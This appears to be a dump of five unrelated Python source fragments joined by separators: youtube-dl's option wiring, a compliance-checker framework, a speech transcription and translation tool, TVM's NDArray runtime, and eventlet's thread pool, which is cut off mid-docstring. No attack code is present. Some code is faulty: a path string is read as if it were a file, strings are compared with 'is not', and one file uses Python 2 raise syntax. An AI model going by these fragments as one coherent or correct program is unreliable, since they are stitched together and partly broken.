'restrictfilenames': opts.restrictfilenames,
'ignoreerrors': opts.ignoreerrors,
'force_generic_extractor': opts.force_generic_extractor,
'ratelimit': opts.ratelimit,
'nooverwrites': opts.nooverwrites,
'retries': opts_retries,
'buffersize': opts.buffersize,
'noresizebuffer': opts.noresizebuffer,
'continuedl': opts.continue_dl,
'noprogress': opts.noprogress,
'progress_with_newline': opts.progress_with_newline,
'playliststart': opts.playliststart,
'playlistend': opts.playlistend,
'playlistreverse': opts.playlist_reverse,
'noplaylist': opts.noplaylist,
'logtostderr': opts.outtmpl == '-',
'consoletitle': opts.consoletitle,
'nopart': opts.nopart,
'updatetime': opts.updatetime,
'writedescription': opts.writedescription,
'writeannotations': opts.writeannotations,
'writeinfojson': opts.writeinfojson,
'writethumbnail': opts.writethumbnail,
'write_all_thumbnails': opts.write_all_thumbnails,
'writesubtitles': opts.writesubtitles,
'writeautomaticsub': opts.writeautomaticsub,
'allsubtitles': opts.allsubtitles,
'listsubtitles': opts.listsubtitles,
'subtitlesformat': opts.subtitlesformat,
'subtitleslangs': opts.subtitleslangs,
'matchtitle': decodeOption(opts.matchtitle),
'rejecttitle': decodeOption(opts.rejecttitle),
'max_downloads': opts.max_downloads,
'prefer_free_formats': opts.prefer_free_formats,
'verbose': opts.verbose,
'dump_intermediate_pages': opts.dump_intermediate_pages,
'write_pages': opts.write_pages,
'test': opts.test,
'keepvideo': opts.keepvideo,
'min_filesize': opts.min_filesize,
'max_filesize': opts.max_filesize,
'min_views': opts.min_views,
'max_views': opts.max_views,
'daterange': date,
'cachedir': opts.cachedir,
'youtube_print_sig_code': opts.youtube_print_sig_code,
'age_limit': opts.age_limit,
'download_archive': download_archive_fn,
'cookiefile': opts.cookiefile,
'nocheckcertificate': opts.no_check_certificate,
'prefer_insecure': opts.prefer_insecure,
'proxy': opts.proxy,
'socket_timeout': opts.socket_timeout,
'bidi_workaround': opts.bidi_workaround,
'debug_printtraffic': opts.debug_printtraffic,
'prefer_ffmpeg': opts.prefer_ffmpeg,
'include_ads': opts.include_ads,
'default_search': opts.default_search,
'youtube_include_dash_manifest': opts.youtube_include_dash_manifest,
'encoding': opts.encoding,
'extract_flat': opts.extract_flat,
'merge_output_format': opts.merge_output_format,
'postprocessors': postprocessors,
'fixup': opts.fixup,
'source_address': opts.source_address,
'call_home': opts.call_home,
'sleep_interval': opts.sleep_interval,
'external_downloader': opts.external_downloader,
'list_thumbnails': opts.list_thumbnails,
'playlist_items': opts.playlist_items,
'xattr_set_filesize': opts.xattr_set_filesize,
'match_filter': match_filter,
'no_color': opts.no_color,
'ffmpeg_location': opts.ffmpeg_location,
'hls_prefer_native': opts.hls_prefer_native,
'external_downloader_args': external_downloader_args,
'postprocessor_args': postprocessor_args,
'cn_verification_proxy': opts.cn_verification_proxy,
}
with YoutubeDL(ydl_opts) as ydl:
# Update version
if opts.update_self:
update_self(ydl.to_screen, opts.verbose)
# Remove cache dir
if opts.rm_cachedir:
ydl.cache.remove()
# Maybe do nothing
if (len(all_urls) < 1) and (opts.load_info_filename is None):
if opts.update_self or opts.rm_cachedir:
sys.exit()
ydl.warn_if_short_id(sys.argv[1:] if argv is None else argv)
parser.error(
'You must provide at least one URL.\n'
'Type youtube-dl --help to see a list of all options.')
try:
if opts.load_info_filename is not None:
retcode = ydl.download_with_info_file(opts.load_info_filename)
else:
retcode = ydl.download(all_urls)
except MaxDownloadsReached:
ydl.to_screen('--max-download limit reached, aborting.')
retcode = 101
sys.exit(retcode)
def main(argv=None):
try:
_real_main(argv)
except DownloadError:
sys.exit(1)
except SameFileError:
sys.exit('ERROR: fixed output name but more than one file to download')
except KeyboardInterrupt:
sys.exit('\nERROR: Interrupted by user')
__all__ = ['main', 'YoutubeDL', 'gen_extractors', 'list_extractors']
| |
#!/usr/bin/env python
"""
Compliance Checker
"""
from functools import wraps
import collections
import pprint
from wicken.netcdf_dogma import NetCDFDogma
from wicken.xml_dogma import MultipleXmlDogma
from wicken.exceptions import DogmaGetterSetterException
from netCDF4 import Dataset
from owslib.swe.observation.sos100 import SensorObservationService_1_0_0
from owslib.swe.sensor.sml import SensorML
from owslib.namespaces import Namespaces
from petulantbear.netcdf_etree import namespaces as pb_namespaces
def get_namespaces():
n = Namespaces()
ns = n.get_namespaces(["ogc","sml","gml","sos","swe","xlink"])
ns["ows"] = n.get_namespace("ows110")
return ns
class DSPair(object):
"""
Structure to hold a dataset/SOS instance and dogma pairing.
Passed to each check method.
"""
dataset = None
dogma = None
def __init__(self, ds, dogma):
self.dataset = ds
self.dogma = dogma
class BaseCheck(object):
HIGH = 3
MEDIUM = 2
LOW = 1
supported_ds = []
@classmethod
def beliefs(cls):
raise NotImplementedError("Define this in your derived Checker class")
def setup(self, ds):
"""
Common setup method for a Checker.
Automatically run when running a CheckSuite. Define this method in your Checker class.
"""
pass
def load_datapair(self, ds):
"""
Returns a DSPair object with the passed ds as one side and the proper Dogma object on the other.
Override this in your derived class.
"""
raise NotImplementedError("Define this in your derived checker class")
class BaseNCCheck(object):
"""
Base Class for NetCDF Dataset supporting Check Suites.
"""
supported_ds = [Dataset]
def load_datapair(self, ds):
# allow ncml as well as nc prefixes
namespaces = pb_namespaces.copy()
namespaces['nc'] = namespaces['ncml']
namespaces['ncml'] = namespaces['ncml']
data_object = NetCDFDogma('ds', self.beliefs(), ds, namespaces=namespaces)
return DSPair(ds, data_object)
class BaseSOSGCCheck(object):
"""
Base class for SOS-GetCapabilities supporting Check Suites.
"""
supported_ds = [SensorObservationService_1_0_0]
def load_datapair(self, ds):
data_object = MultipleXmlDogma('sos-gc', self.beliefs(), ds._capabilities, namespaces=get_namespaces())
return DSPair(ds, data_object)
class BaseSOSDSCheck(object):
"""
Base class for SOS-DescribeSensor supporting Check Suites.
"""
supported_ds = [SensorML]
def load_datapair(self, ds):
data_object = MultipleXmlDogma('sos-ds', self.beliefs(), ds._root, namespaces=get_namespaces())
return DSPair(ds, data_object)
class Result(object):
"""
Holds the result of a check method.
Stores such information as the check's value (True, False, a 2-tuple of (pass, total) or None for a skip),
weight of the check, any granular messages, or a hierarchy of results.
Stores the checker instance and the check method that produced this result.
"""
def __init__(self, weight=BaseCheck.MEDIUM, value=None, name=None, msgs=None, children=None, checker=None, check_method=None):
self.weight = weight
self.value = value
self.name = name
self.msgs = msgs or []
self.children = children or []
self.checker = checker
self.check_method = check_method
def __repr__(self):
ret = "%s (*%s): %s" % (self.name, self.weight, self.value)
if len(self.msgs):
if len(self.msgs) == 1:
ret += " (%s)" % self.msgs[0]
else:
ret += " (%d msgs)" % len(self.msgs)
if len(self.children):
ret += " (%d children)" % len(self.children)
ret += "\n" + pprint.pformat(self.children)
if self.checker is not None:
ret += " Checker: "+str(self.checker)
if self.check_method is not None:
ret += " Call: "+str(self.check_method)
return ret
def std_check_in(dataset_dogma, name, allowed_vals):
"""
Returns 0 if attr not present, 1 if present but not in correct value, 2 if good
"""
if not hasattr(dataset_dogma, name):
return 0
ret_val = 1
try:
if getattr(dataset_dogma, name) in allowed_vals:
ret_val += 1
except DogmaGetterSetterException:
pass
return ret_val
def std_check(dataset_dogma, name):
if hasattr(dataset_dogma, name):
getattr(dataset_dogma, name)
return True
return False
def check_has(priority=BaseCheck.HIGH):
def _inner(func):
def _dec(s, ds):
list_vars = func(s, ds)
ret_val = []
for l in list_vars:
msgs = []
if isinstance(l, tuple):
name, allowed = l
res = std_check_in(ds.dogma, name, allowed)
if res == 0:
msgs.append("Attr %s not present" % name)
elif res == 1:
msgs.append("Attr %s present but not in expected value list (%s)" % (name, allowed))
ret_val.append(Result(priority, (res, 2), name, msgs))
else:
res = std_check(ds.dogma, l)
if not res:
msgs = ["Attr %s not present" % l]
ret_val.append(Result(priority, res, l, msgs))
return ret_val
return wraps(func)(_dec)
return _inner
def fix_return_value(v, method_name, method=None, checker=None):
"""
Transforms scalar return values into Result.
"""
method_name = (method_name or method.im_func.func_name).replace("check_", "") # remove common check prefix
if v is None or not isinstance(v, Result):
v = Result(value=v, name=method_name)
v.name = v.name or method_name
v.checker = checker
v.check_method = method
return v
def score_group(group_name=None):
def _inner(func):
def _dec(s, ds):
ret_val = func(s, ds)
"""
if group_name != None and not isinstance(ret_val[0], tuple):
return tuple([(group_name, ret_val[0])] + list(ret_val[1:]))
"""
# multiple returns
if not isinstance(ret_val, list):
ret_val = [ret_val]
def dogroup(r):
cur_grouping = r.name
if isinstance(cur_grouping, tuple):
cur_grouping = list(cur_grouping)
elif not isinstance(cur_grouping, list):
cur_grouping = [cur_grouping]
cur_grouping.insert(0, group_name)
return Result(r.weight, r.value, tuple(cur_grouping), r.msgs)
ret_val = map(lambda x: fix_return_value(x, func.func_name, func, s), ret_val)
ret_val = map(dogroup, ret_val)
return ret_val
return wraps(func)(_dec)
return _inner
| |
import os
import sys
import time
import subprocess
import optparse
import threading
import platform
import pydub
import json
import speech_recognition
if platform.system() == "Darwin":
from LoopbackCapture.mac.LoopbackCapture import record_sounds
elif platform.system() == "Linux":
from LoopbackCapture.linux.LoopbackCapture import record_sounds
elif platform.system() == "Windows":
from LoopbackCapture.win32.LoopbackCapture import record_sounds
from mic import record_mic
class Diplomatist():
def __init__(self, transcribe_api=0, translate_api=1):
self.load_config()
self.set_transcribe_api(transcribe_api)
self.set_translate_api(translate_api)
os.environ["LOOPBACK_CAPTURE"] = self.config["LOOPBACK_CAPTURE"]
if platform.system() == "Windows":
if not os.path.isfile(os.environ["LOOPBACK_CAPTURE"]):
print("LOOPBACK_CAPTURE error: File Not Found")
sys.exit(-1)
if self.config["SRT"] != "":
self.srt_out = open(self.config["SRT"], "a")
for proxy in self.config["PROXY"]:
os.environ[proxy] = self.config["PROXY"][proxy]
def _failed_if_null(self, input, warning=False):
"""internal function, check if input is null
args:
input (item)
warning (bool)
return:
input\Exception
"""
if input == None or input == "":
if warning:
print("[WARNING]: {} is null.".format(input))
else:
raise Exception("[ERROR]: {} is null.".format(input))
return input
def load_config(self):
"""load config from config.json
"""
with open("config.json") as in_file:
self.config = json.load(in_file)
def save_config(self):
"""save config to config.json
"""
with open("config.json", "w") as out_file:
json.dump(self.config, out_file, sort_keys=True, indent=4)
def set_transcribe_api(self, api=0):
"""set transcribe api
args:
api (int)
"""
self.transcribe_api = api
self.cred = None
if "cred" in self.config["API"][str(api)] and self.config["API"][str(api)]["cred"] != "":
cred_config = self.config["API"][str(api)]["cred"]
if os.path.isfile(cred_config):
with open(cred_config) as in_file:
self.cred = cred_config.read()
else:
self.cred = cred_config
if self.transcribe_api == 4:
if platform.system() == "Windows":
print("DeepSpeech not support Windows for now, please use other APIs.")
sys.exit(-1)
from deepspeech import DeepSpeechRecognizer
self.deepspeech_recognizer = DeepSpeechRecognizer(self._failed_if_null(self.config["API"]["4"]["model"]), self._failed_if_null(self.config["API"]["4"]["alphabet"]), self._failed_if_null(self.config["API"]["4"]["lm"]), self._failed_if_null(self.config["API"]["4"]["trie"]))
if self.transcribe_api == 5:
from azurespeech import AzureSpeechRecognizer
self.azurespeech_recognizer = AzureSpeechRecognizer(self._failed_if_null(self.config["API"]["5"]["key"]), self._failed_if_null(self.config["API"]["5"]["region"]))
def set_translate_api(self, api=1):
"""set translate api
args:
api (int)
"""
self.translate_api = api
if self.translate_api == 1:
import google.cloud.translate
self.translate_client = google.cloud.translate.Client()
def transcribe(self, language="en-US", audio_file=None):
"""transcribe audio to text
args:
language (str)
audio_file (str)
return:
result (str/False)
"""
audio_file_ext = audio_file.split(".")[-1]
if audio_file_ext is not "wav" and audio_file_ext is not "aif":
ori_audio_file = pydub.AudioSegment.from_file(
audio_file, audio_file_ext)
audio_file = audio_file.replace(audio_file_ext, "wav")
exp_audio_file = ori_audio_file.export(audio_file, format="wav")
recognizer = speech_recognition.Recognizer()
with speech_recognition.AudioFile(audio_file) as source:
audio = recognizer.record(source)
try:
if self.transcribe_api == 0:
return recognizer.recognize_sphinx(audio, language)
elif self.transcribe_api == 1:
return recognizer.recognize_google_cloud(audio, self.cred, language)
elif self.transcribe_api == 2:
return recognizer.recognize_bing(audio, self.cred, language)
elif self.transcribe_api == 3:
return recognizer.recognize_houndify(audio, self.cred.split(",")[0], self.cred.split(",")[1])
elif self.transcribe_api == 4:
return self.deepspeech_recognizer.recognize(audio_file)
elif self.transcribe_api == 5:
return self.azurespeech_recognizer.recognize(audio_file)
except speech_recognition.UnknownValueError:
print("Could Not Understand")
return False
except speech_recognition.RequestError as e:
print("Request Error: {0}".format(e))
return False
def translate(self, text, language):
"""translate text to another language
args:
text (str)
language (str)
return:
translated_text (str)
"""
if hasattr(self, "translate_client"):
return self.translate_client.translate(text, target_language=language)['translatedText']
def async_transcribe(self, language="en-US", audio_file=None):
"""transcribe function for async running
args:
language (str)
audio_file (str)
"""
transc = self.transcribe(language, audio_file)
if transc == False:
transc = "Could Not Be Transcribed!"
if hasattr(self, "srt_out"):
self.srt_out.write(transc + "\n")
print(transc)
def async_transcribe_translate(self, transc_lan="en-US", audio_file=None, transl_lan="zh"):
"""transcribe with translate function for async running
args:
transc_lan (str)
audio_file (str)
transl_lan (str)
"""
transc = self.transcribe(transc_lan, audio_file)
if transc == False:
transc = "Could Not Be Transcribed!"
if hasattr(self, "srt_out"):
self.srt_out.write(transc + "\n")
print(transc)
transl = self.translate(transc, transl_lan)
if hasattr(self, "srt_out"):
self.srt_out.write(transl + "\n")
print(transl)
def keep_running(self, language="en-US", time_slice=10000, use_mic=False, translate=None):
"""keep the process running until abort it
args:
language (str)
time_slice (int)
use_mic (bool)
translate (str)
"""
init_time = 0
record_file = "record.wav"
records_folder = self.config["RECORD"]
if not os.path.isdir(records_folder):
os.mkdir(records_folder)
try:
while True:
start_time = time.time()
if use_mic:
record_mic(record_file, time_slice)
else:
record_sounds(record_file, time_slice)
end_time = time.time()
time_str = "{} --> {}".format(time.strftime("%H:%M:%S", time.gmtime(
init_time)), time.strftime("%H:%M:%S", time.gmtime(end_time - start_time + init_time)))
if hasattr(self, "srt_out"):
self.srt_out.write(time_str + "\n")
print(time_str)
init_time = end_time - start_time + init_time
saved_file_name = str(time.time()) + ".wav"
saved_audio_file = os.path.join(
records_folder, saved_file_name)
os.rename(record_file, saved_audio_file)
if translate:
thr = threading.Thread(target=self.async_transcribe_translate, args=(
[language, saved_audio_file, translate]), kwargs={})
thr.start()
else:
thr = threading.Thread(target=self.async_transcribe, args=(
[language, saved_audio_file]), kwargs={})
thr.start()
except KeyboardInterrupt:
print("Process was exited.")
def run_one_time(self, language="en-US", audio_file=None, translate=None):
"""run the process one time
args:
language (str)
audio_file (str)
translate (str)
"""
if translate:
self.async_transcribe_translate(
language, audio_file, translate)
else:
self.async_transcribe(
language, audio_file)
def get_options():
"""get options
"""
parser = optparse.OptionParser()
parser.add_option("-m", "--mic", dest="use_mic", action="store_true", default=False,
help="record sounds from microphone")
parser.add_option("-f", "--file", dest="audio_file", default=None,
help="audio file which to be transcribed and translated")
parser.add_option("-s", "--slice", dest="time_slice", default=10000, type="int",
help="time slice of each wave file")
parser.add_option("-a", "--api", dest="api", default=0, type="int",
help="0 - CMU Sphinx, 1 - Google Cloud, 2 - Bing API, 3 - Houndify API, 4 - Baidu DeepSpeech")
parser.add_option("-l", "--lan", dest="language", default="en-US",
help="language which to be transcribed")
parser.add_option("-t", "--tran", dest="translate", default=None,
help="translate to another language")
parser.add_option("--qt", dest="ui_qt", action="store_true", default=False,
help="runs UI with QT")
parser.add_option("--tk", dest="ui_tk", action="store_true", default=False,
help="runs UI with Tk")
(options, args) = parser.parse_args()
return options
if __name__ == "__main__":
options = get_options()
diplomatist = Diplomatist(options.api)
if options.audio_file:
diplomatist.run_one_time(options.language, options.audio_file, options.translate)
sys.exit(0)
diplomatist.keep_running(options.language, options.time_slice, options.use_mic, options.translate)
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-import, redefined-outer-name
"""Runtime NDArray API"""
import ctypes
import warnings
import numpy as np
import tvm._ffi
from tvm._ffi.base import _LIB, check_call, c_array, string_types, _FFI_MODE
from tvm._ffi.runtime_ctypes import DataType, Device, TVMArray, TVMArrayHandle
from tvm._ffi.runtime_ctypes import DataTypeCode, tvm_shape_index_t
from . import _ffi_api
try:
# pylint: disable=wrong-import-position
if _FFI_MODE == "ctypes":
raise ImportError()
from tvm._ffi._cy3.core import _set_class_ndarray, _make_array, _from_dlpack
from tvm._ffi._cy3.core import NDArrayBase
except (RuntimeError, ImportError) as error:
# pylint: disable=wrong-import-position
if _FFI_MODE == "cython":
raise error
from tvm._ffi._ctypes.ndarray import _set_class_ndarray, _make_array, _from_dlpack
from tvm._ffi._ctypes.ndarray import NDArrayBase
@tvm._ffi.register_object("runtime.NDArray")
class NDArray(NDArrayBase):
"""Lightweight NDArray class of TVM runtime.
Strictly this is only an Array Container (a buffer object)
No arthimetic operations are defined.
All operations are performed by TVM functions.
The goal is not to re-build yet another array library.
Instead, this is a minimal data structure to demonstrate
how can we use TVM in existing project which might have their own array containers.
"""
@property
def dtype(self):
"""Type of this array"""
return str(self.handle.contents.dtype)
@property
def device(self):
"""Device of this array"""
return self.handle.contents.device
def __dlpack__(self, stream=None): # pylint: disable=unused-argument
"""Export the array for consumption by from_dlpack() as a DLPack capsule.
Parameters
----------
stream : int, optional
A Python integer representing a pointer to a stream.
Stream is provided by the consumer to the producer to instruct the producer
to ensure that operations can safely be performed on the array.
Returns
-------
capsule : PyCapsule
A DLPack capsule for the array, containing a DLPackManagedTensor.
"""
return self.to_dlpack()
def __dlpack_device__(self):
"""Return a tuple of device_type, device_id in DLPack convention"""
return (self.handle.contents.device.device_type, self.handle.contents.device.device_id)
def __hash__(self):
return ctypes.cast(self.handle, ctypes.c_void_p).value
def __eq__(self, other):
return self.same_as(other)
def __ne__(self, other):
return not self.__eq__(other)
def same_as(self, other):
"""Check object identity equality
Parameters
----------
other : object
The other object to compare to
Returns
-------
same : bool
Whether other is same as self.
"""
if not isinstance(other, NDArrayBase):
return False
return self.__hash__() == other.__hash__()
def __setitem__(self, in_slice, value):
"""Set ndarray value"""
if (
not isinstance(in_slice, slice)
or in_slice.start is not None
or in_slice.stop is not None
):
raise ValueError("Array only support set from numpy array")
if isinstance(value, NDArrayBase):
if value.handle is not self.handle:
value.copyto(self)
elif isinstance(value, (np.ndarray, np.generic)):
self.copyfrom(value)
else:
raise TypeError("type %s not supported" % str(type(value)))
def copyfrom(self, source_array):
"""Perform an synchronize copy from the array.
Parameters
----------
source_array : array_like
The data source we should like to copy from.
Returns
-------
arr : NDArray
Reference to self.
"""
if isinstance(source_array, NDArrayBase):
source_array.copyto(self)
return self
if not isinstance(source_array, np.ndarray):
try:
source_array = np.array(source_array, dtype=self.dtype)
except:
raise TypeError(
"array must be an array_like data,"
+ "type %s is not supported" % str(type(source_array))
)
t = DataType(self.dtype)
shape, dtype = self.shape, self.dtype
if t.lanes > 1:
shape = shape + (t.lanes,)
t.lanes = 1
dtype = str(t)
if source_array.shape != shape:
raise ValueError(
"array shape do not match the shape of NDArray {0} vs {1}".format(
source_array.shape, shape
)
)
numpy_str_map = DataType.NUMPY2STR
np_dtype_str = (
numpy_str_map[source_array.dtype]
if source_array.dtype in numpy_str_map
else str(source_array.dtype)
)
if (not source_array.flags["C_CONTIGUOUS"]) or (
dtype == "bfloat16" or dtype != np_dtype_str
):
source_array = np.ascontiguousarray(
source_array, dtype="uint16" if dtype == "bfloat16" else dtype
)
assert source_array.flags["C_CONTIGUOUS"]
data = source_array.ctypes.data_as(ctypes.c_void_p)
nbytes = ctypes.c_size_t(source_array.size * source_array.dtype.itemsize)
check_call(_LIB.TVMArrayCopyFromBytes(self.handle, data, nbytes))
return self
def __repr__(self):
res = "<tvm.nd.NDArray shape={0}, {1}>\n".format(self.shape, self.device)
res += self.numpy().__repr__()
return res
def __str__(self):
return str(self.numpy())
def asnumpy(self):
"""Convert this array to numpy array. This API will be deprecated in TVM v0.8 release.
Please use `numpy` instead."""
warnings.warn(
"NDArray.asnumpy() will be deprecated in TVM v0.8 release. "
"Please use NDArray.numpy() instead.",
DeprecationWarning,
)
return self.numpy()
def numpy(self):
"""Convert this array to numpy array
Returns
-------
np_arr : numpy.ndarray
The corresponding numpy array.
"""
t = DataType(self.dtype)
shape, dtype = self.shape, self.dtype
old_dtype = dtype
if t.lanes > 1:
shape = shape + (t.lanes,)
t.lanes = 1
dtype = str(t)
if dtype == "int4":
dtype = "int8"
np_arr = np.empty(shape, dtype=dtype)
assert np_arr.flags["C_CONTIGUOUS"]
data = np_arr.ctypes.data_as(ctypes.c_void_p)
nbytes = ctypes.c_size_t(np_arr.size * np_arr.dtype.itemsize)
check_call(_LIB.TVMArrayCopyToBytes(self.handle, data, nbytes))
if old_dtype == "int4":
length = np_arr.size
np_arr_ret = np.empty((length,), dtype="int8")
np_arr = np_arr.reshape((length,))
old_index = np.bitwise_and(np_arr, 0x0F)
even_index = np.bitwise_and(np_arr >> 4, 0x0F)
np_arr_ret[1::2] = old_index[0 : length // 2]
np_arr_ret[0::2] = even_index[0 : length // 2]
return np_arr_ret.reshape(shape)
return np_arr
def copyto(self, target):
"""Copy array to target
Parameters
----------
target : NDArray
The target array to be copied, must have same shape as this array.
"""
if isinstance(target, NDArrayBase):
return self._copyto(target)
if isinstance(target, Device):
res = empty(self.shape, self.dtype, target)
return self._copyto(res)
raise ValueError("Unsupported target type %s" % str(type(target)))
def device(dev_type, dev_id=0):
"""Construct a TVM device with given device type and id.
Parameters
----------
dev_type: int or str
The device type mask or name of the device.
dev_id : int, optional
The integer device id
Returns
-------
dev: tvm.runtime.Device
The corresponding device.
Examples
--------
Device can be used to create reflection of device by
string representation of the device type.
.. code-block:: python
assert tvm.device("cpu", 1) == tvm.cpu(1)
assert tvm.device("cuda", 0) == tvm.cuda(0)
"""
if isinstance(dev_type, string_types):
dev_type = dev_type.split()[0]
if dev_type not in Device.STR2MASK:
raise ValueError("Unknown device type %s" % dev_type)
dev_type = Device.STR2MASK[dev_type]
return Device(dev_type, dev_id)
def numpyasarray(np_data):
"""Return a TVMArray representation of a numpy array."""
data = np_data
assert data.flags["C_CONTIGUOUS"]
arr = TVMArray()
shape = c_array(tvm_shape_index_t, data.shape)
arr.data = data.ctypes.data_as(ctypes.c_void_p)
arr.shape = shape
arr.strides = None
arr.dtype = DataType(np.dtype(data.dtype).name)
arr.ndim = data.ndim
# CPU device
arr.device = device(1, 0)
return arr, shape
def empty(shape, dtype="float32", device=device(1, 0), mem_scope=None):
"""Create an empty array given shape and device
Parameters
----------
shape : tuple of int
The shape of the array.
dtype : type or str
The data type of the array.
device : Device
The device of the array.
mem_scope : Optional[str]
The memory scope of the array.
Returns
-------
arr : tvm.nd.NDArray
The array tvm supported.
"""
shape_imm = []
for s in shape:
if isinstance(s, tvm.tir.IntImm):
shape_imm.append(s.value)
else:
shape_imm.append(int(s))
arr = np.array(shape_imm, "int64")
ptr = arr.ctypes.data_as(ctypes.POINTER(ctypes.c_int64))
shape_ptr = ctypes.cast(ptr, ctypes.c_void_p)
ndim = len(shape_imm)
dtype = DataType(dtype)
arr = _ffi_api.TVMArrayAllocWithScope(shape_ptr, ndim, dtype, device, mem_scope)
return arr
def from_dlpack(dltensor):
"""Produces an array from an object with __dlpack__ method or a DLPack tensor w/o memory copy.
Retreives the underlying DLPack tensor's pointer to create an array from the
data. Removes the original DLPack tensor's destructor as now the array is
responsible for destruction.
Parameters
----------
dltensor : object with __dlpack__ attribute or a DLPack capsule
Returns
-------
arr: tvm.nd.NDArray
The array view of the tensor data.
"""
t = type(dltensor)
if t.__module__ == "builtins" and t.__name__ == "PyCapsule":
return _from_dlpack(dltensor)
if hasattr(dltensor, "__dlpack__"):
dlpack_caps = dltensor.__dlpack__()
return _from_dlpack(dlpack_caps)
raise AttributeError("Required attribute __dlpack__ not found")
def cpu(dev_id=0):
"""Construct a CPU device
Parameters
----------
dev_id : int, optional
The integer device id
Returns
-------
dev : Device
The created device
"""
return Device(1, dev_id)
def cuda(dev_id=0):
"""Construct a CUDA GPU device
Parameters
----------
dev_id : int, optional
The integer device id
Returns
-------
dev : Device
The created device
"""
return Device(2, dev_id)
def gpu(dev_id=0):
"""Construct a CUDA GPU device
deprecated:: 0.9.0
Use :py:func:`tvm.cuda` instead.
Parameters
----------
dev_id : int, optional
The integer device id
Returns
-------
dev : Device
The created device
"""
warnings.warn(
"Please use tvm.cuda() instead of tvm.gpu(). tvm.gpu() is going to be deprecated in 0.9.0",
)
return Device(2, dev_id)
def rocm(dev_id=0):
"""Construct a ROCM device
Parameters
----------
dev_id : int, optional
The integer device id
Returns
-------
dev : Device
The created device
"""
return Device(10, dev_id)
def opencl(dev_id=0):
"""Construct a OpenCL device
Parameters
----------
dev_id : int, optional
The integer device id
Returns
-------
dev : Device
The created device
"""
return Device(4, dev_id)
def metal(dev_id=0):
"""Construct a metal device
Parameters
----------
dev_id : int, optional
The integer device id
Returns
-------
dev : Device
The created device
"""
return Device(8, dev_id)
def vpi(dev_id=0):
"""Construct a VPI simulated device
Parameters
----------
dev_id : int, optional
The integer device id
Returns
-------
dev : Device
The created device
"""
return Device(9, dev_id)
def vulkan(dev_id=0):
"""Construct a Vulkan device
Parameters
----------
dev_id : int, optional
The integer device id
Returns
-------
dev : Device
The created device
"""
return Device(7, dev_id)
def ext_dev(dev_id=0):
"""Construct a extension device
Parameters
----------
dev_id : int, optional
The integer device id
Returns
-------
dev : Device
The created device
Note
----
This API is reserved for quick testing of new
device by plugin device API as ext_dev.
"""
return Device(12, dev_id)
def hexagon(dev_id=0):
"""Construct a Hexagon device
Parameters
----------
dev_id : int, optional
The integer device id
Returns
-------
dev : Device
The created device
"""
return Device(14, dev_id)
def webgpu(dev_id=0):
"""Construct a webgpu device.
Parameters
----------
dev_id : int, optional
The integer device id
Returns
-------
dev : Device
The created device
"""
return Device(15, dev_id)
cl = opencl
mtl = metal
def array(arr, device=cpu(0)):
"""Create an array from source arr.
Parameters
----------
arr : numpy.ndarray
The array to be copied from
device : Device, optional
The device device to create the array
Returns
-------
ret : NDArray
The created array
"""
if isinstance(arr, tvm.ir.container.Array):
raise AttributeError("arr is an instance of", type(arr))
if not isinstance(arr, (np.ndarray, NDArray)):
arr = np.array(arr)
return empty(arr.shape, arr.dtype, device).copyfrom(arr)
# Register back to FFI
_set_class_ndarray(NDArray)
| |
# Copyright (c) 2007-2009, Linden Research, Inc.
# Copyright (c) 2007, IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import imp
import os
import sys
from eventlet import event
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
threading = patcher.original('threading')
Queue_module = patcher.original('Queue')
Queue = Queue_module.Queue
Empty = Queue_module.Empty
__all__ = ['execute', 'Proxy', 'killall']
QUIET=True
_rfile = _wfile = None
_bytetosend = ' '.encode()
def _signal_t2e():
_wfile.write(_bytetosend)
_wfile.flush()
_rspq = None
def tpool_trampoline():
global _rspq
while(True):
try:
_c = _rfile.read(1)
assert _c
except ValueError:
break # will be raised when pipe is closed
while not _rspq.empty():
try:
(e,rv) = _rspq.get(block=False)
e.send(rv)
rv = None
except Empty:
pass
SYS_EXCS = (KeyboardInterrupt, SystemExit)
def tworker(reqq):
global _rspq
while(True):
try:
msg = reqq.get()
except AttributeError:
return # can't get anything off of a dud queue
if msg is None:
return
(e,meth,args,kwargs) = msg
rv = None
try:
rv = meth(*args,**kwargs)
except SYS_EXCS:
raise
except Exception:
rv = sys.exc_info()
# test_leakage_from_tracebacks verifies that the use of
# exc_info does not lead to memory leaks
_rspq.put((e,rv))
meth = args = kwargs = e = rv = None
_signal_t2e()
def execute(meth,*args, **kwargs):
"""
Execute *meth* in a Python thread, blocking the current coroutine/
greenthread until the method completes.
The primary use case for this is to wrap an object or module that is not
amenable to monkeypatching or any of the other tricks that Eventlet uses
to achieve cooperative yielding. With tpool, you can force such objects to
cooperate with green threads by sticking them in native threads, at the cost
of some overhead.
"""
setup()
# if already in tpool, don't recurse into the tpool
# also, call functions directly if we're inside an import lock, because
# if meth does any importing (sadly common), it will hang
my_thread = threading.currentThread()
if my_thread in _threads or imp.lock_held() or _nthreads == 0:
return meth(*args, **kwargs)
cur = greenthread.getcurrent()
# a mini mixing function to make up for the fact that hash(greenlet) doesn't
# have much variability in the lower bits
k = hash(cur)
k = k + 0x2c865fd + (k >> 5)
k = k ^ 0xc84d1b7 ^ (k >> 7)
thread_index = k % _nthreads
reqq, _thread = _threads[thread_index]
e = event.Event()
reqq.put((e,meth,args,kwargs))
rv = e.wait()
if isinstance(rv,tuple) and len(rv) == 3 and isinstance(rv[1],Exception):
import traceback
(c,e,tb) = rv
if not QUIET:
traceback.print_exception(c,e,tb)
traceback.print_stack()
raise c,e,tb
return rv
def proxy_call(autowrap, f, *args, **kwargs):
"""
Call a function *f* and returns the value. If the type of the return value
is in the *autowrap* collection, then it is wrapped in a :class:`Proxy`
object before return.
